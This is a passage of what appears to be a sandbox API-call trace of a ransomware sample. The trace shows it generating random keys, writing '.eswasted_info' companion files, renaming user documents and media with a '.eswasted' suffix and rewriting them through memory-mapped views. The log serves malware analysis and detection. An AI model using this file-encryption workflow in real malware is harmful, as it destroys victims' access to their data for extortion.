hHeap=0x6d0000) returned 1 [0073.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c448 | out: hHeap=0x6d0000) returned 1 [0073.927] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.928] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.928] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\Og65i8p23Yb_.ots") returned 90 [0073.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2be) returned 0x70c160 [0073.928] lstrcpyW (in: lpString1=0x70c214, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.928] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.929] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.929] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\Og65i8p23Yb_.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\og65i8p23yb_.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.930] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.931] SetEndOfFile (hFile=0x11c) returned 1 [0073.931] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.931] lstrcpyW (in: lpString1=0x70c214, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\Og65i8p23Yb_.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\og65i8p23yb_.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\Og65i8p23Yb_.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\og65i8p23yb_.ots.eswasted")) returned 1 [0073.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\Og65i8p23Yb_.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\og65i8p23yb_.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.932] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.932] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x17934 [0073.932] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17934) returned 0x330000 [0073.932] CloseHandle (hObject=0x130) returned 1 [0073.938] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.939] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.939] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.939] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.940] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.940] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.951] SetEndOfFile (hFile=0x11c) returned 1 [0073.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.954] CloseHandle (hObject=0x11c) returned 1 [0073.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.955] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c780 | out: hHeap=0x6d0000) returned 1 [0073.956] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.957] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.957] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.957] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\TyIftuQdeV.gif") returned 88 [0073.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ba) returned 0x70c160 [0073.957] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.957] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.958] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.958] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\TyIftuQdeV.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\tyiftuqdev.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.969] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.970] SetEndOfFile (hFile=0x11c) returned 1 [0073.970] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.970] lstrcpyW (in: lpString1=0x70c210, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\TyIftuQdeV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\tyiftuqdev.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\TyIftuQdeV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\tyiftuqdev.gif.eswasted")) returned 1 [0073.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\TyIftuQdeV.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\tyiftuqdev.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.971] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0073.972] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x1052d [0073.972] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1052d) returned 0x330000 [0073.972] CloseHandle (hObject=0x108) returned 1 [0073.976] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.977] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.977] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.977] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.978] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.978] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.988] SetEndOfFile (hFile=0x11c) returned 1 [0073.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.991] CloseHandle (hObject=0x11c) returned 1 [0073.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c890 | out: hHeap=0x6d0000) returned 1 [0073.993] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.994] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.994] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W1U79DXC.mkv") returned 54 [0073.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x276) returned 0x71c6c8 [0073.995] lstrcpyW (in: lpString1=0x71c734, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.995] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.996] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.996] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W1U79DXC.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w1u79dxc.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.997] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.998] SetEndOfFile (hFile=0x11c) returned 1 [0073.999] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.999] lstrcpyW (in: lpString1=0x71c734, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W1U79DXC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w1u79dxc.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W1U79DXC.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w1u79dxc.mkv.eswasted")) returned 1 [0074.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W1U79DXC.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w1u79dxc.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0074.000] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.000] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x1137e [0074.000] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1137e) returned 0x330000 [0074.000] CloseHandle (hObject=0x130) returned 1 [0074.005] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.006] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0074.006] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.006] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.008] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.008] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.041] SetEndOfFile (hFile=0x11c) returned 1 [0074.073] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.073] CloseHandle (hObject=0x11c) returned 1 [0074.074] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c6c8 | out: hHeap=0x6d0000) returned 1 [0074.074] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bc90 | out: hHeap=0x6d0000) returned 1 [0074.074] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.075] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.075] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.075] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z_XV.rtf") returned 50 [0074.075] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x6f5cc0 [0074.075] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.075] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.075] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.076] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.076] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z_XV.rtf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xv.rtf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.076] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.077] SetEndOfFile (hFile=0x11c) returned 1 [0074.077] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.078] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.078] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z_XV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xv.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z_XV.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xv.rtf.eswasted")) returned 1 [0074.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z_XV.rtf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xv.rtf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0074.078] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0074.078] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x9d4b [0074.078] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d4b) returned 0x330000 [0074.079] CloseHandle (hObject=0x108) returned 1 [0074.081] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.082] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.082] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.082] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.083] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.083] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.092] SetEndOfFile (hFile=0x11c) returned 1 [0074.094] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.094] CloseHandle (hObject=0x11c) returned 1 [0074.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0074.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c9a0 | out: hHeap=0x6d0000) returned 1 [0074.095] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.096] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.096] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6nm83gQvsAMAgLL.docx") returned 64 [0074.096] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x6f5cc0 [0074.096] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.096] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.096] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0074.097] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.097] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6nm83gQvsAMAgLL.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6nm83gqvsamagll.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.098] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0074.099] SetEndOfFile (hFile=0x11c) returned 1 [0074.099] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.099] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6nm83gQvsAMAgLL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6nm83gqvsamagll.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6nm83gQvsAMAgLL.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6nm83gqvsamagll.docx.eswasted")) returned 1 [0074.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6nm83gQvsAMAgLL.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6nm83gqvsamagll.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0074.100] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0074.100] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x3786 [0074.100] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3786) returned 0x330000 [0074.100] CloseHandle (hObject=0x130) returned 1 [0074.103] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0074.117] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0074.117] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.117] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0074.118] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0074.118] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.126] SetEndOfFile (hFile=0x11c) returned 1 [0074.151] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0074.151] CloseHandle (hObject=0x11c) returned 1 [0074.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0074.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ca60 | out: hHeap=0x6d0000) returned 1 [0074.152] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0074.153] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0074.153] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7Ll4HJLbk_I.pptx") returned 60 [0074.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x1412c98 [0074.153] lstrcpyW (in: lpString1=0x1412d10, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.153] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 